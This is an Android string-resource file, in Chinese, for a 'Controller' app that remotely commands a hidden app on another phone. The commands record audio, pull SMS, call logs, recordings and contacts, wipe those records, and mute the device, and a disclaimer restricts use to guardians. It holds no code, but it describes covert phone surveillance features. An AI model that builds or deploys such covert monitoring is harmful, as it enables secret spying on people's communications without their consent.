<?xml version="1.0" encoding="utf-8"?>
<resources>

    <string name="app_name">Controller</string>
    <string name="hello_world">Hello world!</string>
    <string name="send_command_confirm">你确定要发送以下命令吗？</string>
    <string name="wifi_gprs_select">"对方执行此命令的网络环境："</string>
    <string name="wifi">"仅 WIFI"</string>
    <string name="wifi_gprs">"WIFI、GPRS"</string>
    <string name="confirm">确定发送</string>
    <string name="copy_clipboard">复制命令</string>
    <string name="next">下一步</string>
    <string name="input_audio_time">请输入录音时间（分钟）</string>
    <string name="input_hint_int">大于0小于100的整数</string>
    <string name="send_command_success">命令发送成功！</string>
    <string name="send_command_error">您未提供对方电话号码，请复制命令手动发送。</string>
    <string name="send_command_fail">命令发送失败！</string>
    <string name="input_string_alarm">录音时间不能为空</string>
    <string name="input_int_alarm">录音时间不符合要求</string>
    <string name="copy_to_clipboard_success">已经将命令复制到剪切板！</string>

    <!--  -->

    <string name="btn_turn_up">调大音量</string>
    <string name="btn_turn_down">调低音量</string>

    <!--  -->
    <string name="clear_title">清除命令</string>
    <string name="clear_msg">清除短信记录</string>
    <string name="clear_call">清除通话记录</string>
    <string name="clear_call_audio">清除通话录音记录</string>
    <string name="clear_other_audio">清除其它录音记录</string>
    <string name="clear_all">清除所有记录</string>

    <!--  -->

    <string name="normal_title">常规控制</string>
    <string name="normal_turn_up">调大音量</string>
    <string name="normal_calm_down">静音</string>
    <string name="normal_call_me">给我打电话</string>
    <string name="normal_record_time">录音N分钟</string>
    <string name="normal_record_start">开始录音</string>
    <string name="normal_record_end">结束录音</string>
    <string name="mobile_turnup">开启移动网络</string>
    <string name="wifi_turnup">开启WIFI网络</string>

    <!--  -->

    <string name="wifi_title">获取记录</string>
    <string name="wifi_msg_call">获取短信和通话记录</string>
    <string name="wifi_call_audio">获取通话录音</string>
    <string name="wifi_call_other_audio">获取其它录音</string>
    <string name="wifi_all">获取全部</string>
    <string name="wifi_contacts">获取通讯录</string>
    <string name="about_title">声明</string>
    <string name="about_info">"1、本程序（包括控制端和受控端）仅供特殊人群使用，包括需要监护人特别照顾的老人、小孩等人群；\r\n\r\n2、未经他人许可的情况下严禁给他人手机安装受控端软件；\r\n\r\n3、受控软件安装到手机上不会影响用户的正常操作，考虑到可能会被小孩等特殊人群无意卸载或禁用，受控端会比较隐蔽；\r\n\r\n4、任何由此软件产生的法律纠纷由使用者自负！"</string>

</resources>